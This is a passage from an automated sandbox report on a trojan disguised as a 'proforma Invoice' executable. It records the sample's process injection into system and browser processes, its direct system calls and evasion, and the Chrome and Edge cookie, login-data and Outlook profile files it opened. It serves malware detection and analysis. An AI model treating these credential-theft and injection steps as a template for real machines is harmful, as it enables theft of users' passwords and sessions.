                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C5ED mov eax, dword ptr fs:[00000030h]3_2_0119C5ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011625E0 mov eax, dword ptr fs:[00000030h]3_2_011625E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A430 mov eax, dword ptr fs:[00000030h]3_2_0119A430
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C427 mov eax, dword ptr fs:[00000030h]3_2_0115C427
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118245A mov eax, dword ptr fs:[00000030h]3_2_0118245A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115645D mov eax, dword ptr fs:[00000030h]3_2_0115645D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC460 mov ecx, dword ptr fs:[00000030h]3_2_011EC460
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011944B0 mov ecx, dword ptr fs:[00000030h]3_2_011944B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EA4B0 mov eax, dword ptr fs:[00000030h]3_2_011EA4B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011664AB mov eax, dword ptr fs:[00000030h]3_2_011664AB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011604E5 mov ecx, dword ptr fs:[00000030h]3_2_011604E5
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160710 mov eax, dword ptr fs:[00000030h]3_2_01160710
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01190710 mov eax, dword ptr fs:[00000030h]3_2_01190710
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C700 mov eax, dword ptr fs:[00000030h]3_2_0119C700
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov eax, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov ecx, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov eax, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DC730 mov eax, dword ptr fs:[00000030h]3_2_011DC730
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C720 mov eax, dword ptr fs:[00000030h]3_2_0119C720
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C720 mov eax, dword ptr fs:[00000030h]3_2_0119C720
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE75D mov eax, dword ptr fs:[00000030h]3_2_011EE75D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160750 mov eax, dword ptr fs:[00000030h]3_2_01160750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2750 mov eax, dword ptr fs:[00000030h]3_2_011A2750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2750 mov eax, dword ptr fs:[00000030h]3_2_011A2750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4755 mov eax, dword ptr fs:[00000030h]3_2_011E4755
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov esi, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov eax, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov eax, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168770 mov eax, dword ptr fs:[00000030h]3_2_01168770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120678E mov eax, dword ptr fs:[00000030h]3_2_0120678E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011607AF mov eax, dword ptr fs:[00000030h]3_2_011607AF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116C7C0 mov eax, dword ptr fs:[00000030h]3_2_0116C7C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E07C3 mov eax, dword ptr fs:[00000030h]3_2_011E07C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011647FB mov eax, dword ptr fs:[00000030h]3_2_011647FB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011647FB mov eax, dword ptr fs:[00000030h]3_2_011647FB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE7E1 mov eax, dword ptr fs:[00000030h]3_2_011EE7E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2619 mov eax, dword ptr fs:[00000030h]3_2_011A2619
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE609 mov eax, dword ptr fs:[00000030h]3_2_011DE609
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E627 mov eax, dword ptr fs:[00000030h]3_2_0117E627
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01196620 mov eax, dword ptr fs:[00000030h]3_2_01196620
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198620 mov eax, dword ptr fs:[00000030h]3_2_01198620
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116262C mov eax, dword ptr fs:[00000030h]3_2_0116262C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122866E mov eax, dword ptr fs:[00000030h]3_2_0122866E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122866E mov eax, dword ptr fs:[00000030h]3_2_0122866E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117C640 mov eax, dword ptr fs:[00000030h]3_2_0117C640
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01192674 mov eax, dword ptr fs:[00000030h]3_2_01192674
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A660 mov eax, dword ptr fs:[00000030h]3_2_0119A660
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A660 mov eax, dword ptr fs:[00000030h]3_2_0119A660
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164690 mov eax, dword ptr fs:[00000030h]3_2_01164690
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164690 mov eax, dword ptr fs:[00000030h]3_2_01164690
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011966B0 mov eax, dword ptr fs:[00000030h]3_2_011966B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C6A6 mov eax, dword ptr fs:[00000030h]3_2_0119C6A6
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0119A6C7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A6C7 mov eax, dword ptr fs:[00000030h]3_2_0119A6C7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E06F1 mov eax, dword ptr fs:[00000030h]3_2_011E06F1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E06F1 mov eax, dword ptr fs:[00000030h]3_2_011E06F1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE6F2 mov eax, dword ptr fs:[00000030h]3_2_011DE6F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC912 mov eax, dword ptr fs:[00000030h]3_2_011EC912
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158918 mov eax, dword ptr fs:[00000030h]3_2_01158918
                Source: C:\Users\user\Desktop\proforma Invoice.exe
                    Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                    NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                    NtQueryAttributesFile: Direct from: 0x76EF2E6C
                    NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                    NtQuerySystemInformation: Direct from: 0x76EF48CC
                    NtOpenSection: Direct from: 0x76EF2E0C
                    NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                    NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                    NtQueryInformationToken: Direct from: 0x76EF2CAC
                    NtCreateFile: Direct from: 0x76EF2FEC
                    NtOpenFile: Direct from: 0x76EF2DCC
                    NtTerminateThread: Direct from: 0x76EF2FCC
                    NtOpenKeyEx: Direct from: 0x76EF2B9C
                    NtSetInformationProcess: Direct from: 0x76EF2C5C
                    NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                    NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                    NtNotifyChangeKey: Direct from: 0x76EF3C2C
                    NtCreateMutant: Direct from: 0x76EF35CC
                    NtResumeThread: Direct from: 0x76EF36AC
                    NtMapViewOfSection: Direct from: 0x76EF2D1C
                    NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                    NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                    NtQuerySystemInformation: Direct from: 0x76EF2DFC
                    NtReadFile: Direct from: 0x76EF2ADC
                    NtDelayExecution: Direct from: 0x76EF2DDC
                    NtQueryInformationProcess: Direct from: 0x76EF2C26
                    NtResumeThread: Direct from: 0x76EF2FBC
                    NtCreateUserProcess: Direct from: 0x76EF371C
                    NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                    NtWriteVirtualMemory: Direct from: 0x76EF490C
                    NtSetInformationThread: Direct from: 0x76EE63F9
                    NtClose: Direct from: 0x76EF2B6C
                    NtSetInformationThread: Direct from: 0x76EF2B4C
                    NtReadVirtualMemory: Direct from: 0x76EF2E8C
                    NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\proforma Invoice.exe
                    Memory written: C:\Users\user\Desktop\proforma Invoice.exe base: 400000 value starts with: 4D5A
                    Section loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: execute and read and write
                    Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe
                    Section loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: read write
                    Section loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: execute and read and write
                    Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Thread register set: target process: 6160
                    Thread APC queued: target process: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                Source: C:\Users\user\Desktop\proforma Invoice.exe
                    Process created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                    Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe
                    Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387485851.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498402024.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498388269.0000000001631000.00000002.00000001.00040000.00000000.sdmp
                    Binary or memory string: Program Manager
                    Binary or memory string: Shell_TrayWnd
                    Binary or memory string: Progman
                    Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\proforma Invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match File source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1550873 Sample: proforma Invoice.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100
                Process chain: proforma Invoice.exe (started) -> proforma Invoice.exe (started) -> kYuxUXtJmKaZ.exe (injected) -> EhStorAuthn.exe (started) -> kYuxUXtJmKaZ.exe (injected) and firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                proforma Invoice.exe | 53% | ReversingLabs | Win32.Trojan.SnakeKeylogger |
                proforma Invoice.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1550873
                                                                        Start date and time:2024-11-07 10:08:04 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 46s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
